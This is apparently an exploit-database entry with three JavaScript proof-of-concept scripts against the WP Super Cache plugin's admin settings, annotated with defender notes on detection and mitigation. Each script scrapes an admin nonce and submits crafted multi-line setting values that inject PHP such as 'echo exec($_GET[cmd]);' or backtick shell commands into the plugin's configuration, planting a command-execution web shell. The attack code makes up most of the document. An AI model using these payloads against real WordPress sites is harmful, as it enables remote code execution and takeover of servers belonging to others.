## https://sploitus.com/exploit?id=WPEX-ID:2142C3D3-9A7F-4E3C-8776-D469A355D62F
//Exploit $cache_path
//
// Proof of concept against the WP Super Cache settings page (advisory id in the page
// header). It needs a session that can open the plugin's wp-admin settings page: the
// nonce it submits is scraped from that page's HTML, so an unauthenticated request has
// nothing to scrape. jQuery is used directly, so this presumably runs in a browser
// context where the admin session cookie is sent -- confirm against the advisory.
//
// Defender notes:
//  - Root cause, as far as this snippet shows: the `wp_cache_location` setting accepts
//    newline characters and PHP syntax. Presumably the plugin writes the value into a
//    PHP configuration file without stripping them -- confirm against the advisory.
//  - A legitimate cache location is a single-line filesystem path. Newline, `$`, `;`
//    or `#` in this field is a high-confidence signal for WAF and request-log rules.
//  - Mitigation: run a plugin release that validates these settings, restrict who holds
//    the capability to change plugin settings, and put file-integrity monitoring on the
//    plugin's generated PHP configuration file.

// `url` is assigned without a declaration (implicit global); 'wp.lab' is a lab host.
url = 'http://wp.lab/wordpress/wp-admin/options-general.php?page=wpsupercache&tab=settings';
// Request 1: load the settings form to obtain a valid nonce, then submit the crafted value.
jQuery.get(url,function(e){
  jQuery.post(url,{
      "action": "scupdates",
      // Nonce scraped from the form HTML; match() returns null (and [1] throws) when the
      // page contains no nonce field, e.g. when the session cannot access this page.
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_enabled": 1,
      // Multi-line value: a path, then lines carrying a PHP statement that passes the
      // `cmd` query parameter to exec(). This is the field server-side validation must reject.
      "wp_cache_location": "/tmp/\n$cache_path\necho exec($_GET[cmd]);#"
  })
  // Logged as soon as the POST is dispatched; it does not show that the server accepted it.
  console.log('SET!');
}).then(()=>{

  // Request 2: same form, fresh nonce, ordinary-looking cache location. In logs the pair
  // appears as two settings updates in quick succession, the first with control characters.
  jQuery.get(url,function(e){
      jQuery.post(url,{
          "action": "scupdates",
          "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
          "wp_cache_enabled": 1,
          "wp_cache_location": "./"
      })
  });
  console.log('EXPLOIT!');
});


//Exploit $wp_cache_debug_ip, $wp_super_cache_front_page_text
//
// Same pattern as a settings-injection proof of concept, aimed at the plugin's debug tab:
// a crafted multi-line value is submitted in `wp_cache_debug_ip`, with
// `wp_super_cache_front_page_text` shown as a commented-out alternative field.
//
// Defender notes:
//  - A debug IP setting should only ever hold an IP address. Validating it as one
//    server-side, and rejecting any control characters, removes this input as an
//    injection point.
//  - For detection, look for POSTs to the wpsupercache debug tab where either field
//    contains a newline, `$`, `;` or `#`.
//  - The requests carry a nonce scraped from the admin page, so they come from a session
//    that can already open the plugin settings; review which accounts have that access.

// '[Target]' is a placeholder host; `url` is assigned without a declaration.
url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=debug';	
// Request 1: fetch the debug form for its nonce, then submit the crafted value.
jQuery.get(url,function(e){
  jQuery.post(url,{
      "wp_cache_debug": 1,
      // Nonce scraped from the form HTML; [1] throws if the page has no nonce field.
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      // Multi-line value carrying a PHP statement that passes the `cmd` query parameter
      // to exec(); not a valid IP address under any reading.
      "wp_cache_debug_ip": "/tmp/\n$wp_cache_debug_ip\necho exec($_GET[cmd]);#"
      //"wp_super_cache_front_page_text": "/tmp/\n$wp_super_cache_front_page_text\necho exec($_GET[cmd]);#"
  })
  // Logged when the POST is dispatched, not when the server responds.
  console.log('SET!');
}).then(()=>{

  // Request 2: resubmits the same form with the plain value "1" and a fresh nonce.
  jQuery.get(url,function(e){
      jQuery.post(url,{
      "wp_cache_debug": 1,
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_debug_ip": "1"
      //"wp_super_cache_front_page_text": "1"
      })
  });
  console.log('EXPLOIT!');
});


//Exploit $cache_scheduled_time + $cached_direct_pages
//
// Three-step variant against the plugin's settings tab. The crafted content is split
// across two fields of the `expirytime` action: `cache_scheduled_time` carries a newline
// and a backtick, and `new_direct_page` carries backticks around `$_GET[cmd]`. In PHP a
// backtick-quoted string is executed as a shell command.
//
// Defender notes:
//  - Neither field needs free-form text. A scheduled time can be validated against a
//    strict HH:MM pattern and a direct page against a URL-path pattern; both should
//    reject newlines and backticks.
//  - Because the payload is split, a detection rule that inspects one parameter at a time
//    sees only fragments. Match a backtick or newline in either field instead of looking
//    for a complete PHP statement.
//  - The nonce is scraped from the admin page each time, so every step depends on a
//    session that can open the plugin settings.

// '[Target]' is a placeholder host; `url` is assigned without a declaration.
url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=settings';	
// Step 1: enable caching through the ordinary `scupdates` action (no crafted value here).
jQuery.get(url,function(e){
  jQuery.post(url,{
      "action": "scupdates",
      "wp_cache_enabled": "1",
      // Nonce scraped from the form HTML; [1] throws if the page has no nonce field.
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1]
  })
  // Logged when the POST is dispatched, not when the server responds.
  console.log('SET1!');
}).then(()=>{

  // Step 2: submit the crafted pair of values through the `expirytime` action.
  jQuery.get(url,function(e){
      jQuery.post(url,{
      "action":"expirytime",
      // Newline followed by a backtick: not a valid time of day.
      "cache_scheduled_time": "\n`:00",
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      // Backtick-wrapped `$_GET[cmd]`: not a valid page path.
      "new_direct_page":"`;echo`$_GET[cmd]`;#"
      })
  }).then(()=>{
    
      console.log('EXPLOIT!');
      // Step 3: resubmit with a well-formed time ("00:00") and the same crafted
      // `new_direct_page` value, again with a freshly scraped nonce.
      jQuery.get(url,function(e){
          jQuery.post(url,{
          "action":"expirytime",
          "cache_scheduled_time": "00:00",
          "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
          "new_direct_page":"`;echo`$_GET[cmd]`;#"
          })
      })

  });
  // Runs right after the step-2 GET is started, so it can print before 'EXPLOIT!'.
  console.log('SET2!');
});